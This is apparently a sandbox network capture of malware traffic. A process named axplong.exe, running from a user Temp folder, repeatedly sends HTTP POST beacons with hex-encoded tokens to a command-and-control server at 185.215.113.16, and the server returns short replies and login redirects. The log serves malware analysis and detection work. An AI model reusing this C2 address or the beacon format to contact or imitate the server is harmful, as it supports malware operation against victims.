Sep 27, 2024 00:21:08.908025026 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:09.147891998 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49789	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:09.397687912 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:10.106559038 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49790	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:10.115262032 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:10.844120026 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49791	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:10.983480930 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49792	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:11.005228996 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:11.738280058 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49793	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:11.865564108 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:12.592483997 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49794	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:12.602617025 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:13.380734921 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49795	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:13.518901110 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:14.229989052 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49796	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:14.241715908 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:14.954066992 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49797	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:15.096637011 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:15.814302921 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49798	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:15.824390888 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:16.566323996 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49799	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:16.687654972 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:17.377526999 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49800	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:17.390743971 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:18.113296986 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49801	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:18.234447002 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49802	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:18.796744108 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:19.543080091 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49803	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:19.657233000 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:20.365854025 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49804	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:20.377222061 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49805	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:20.500839949 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:21.212531090 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49806	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:21.224936962 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:21.959649086 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49807	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:22.094769001 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:22.904445887 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49808	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:22.917563915 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:23.651060104 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49809	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:23.768018961 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:24.469558001 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49810	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:24.479502916 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:25.190512896 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49811	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:25.312542915 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:26.025213003 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49812	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
